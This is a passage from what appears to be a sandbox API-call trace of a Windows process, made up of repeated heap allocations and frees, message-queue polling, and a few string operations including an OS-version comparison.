Flags=0x0, Size=0x10) returned 0x34aa688 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0209.282] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0209.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0209.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.283] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.283] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.284] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.284] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.285] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.286] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.287] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.289] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.289] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.289] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0209.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.290] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.292] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.292] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0209.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.295] HeapFree 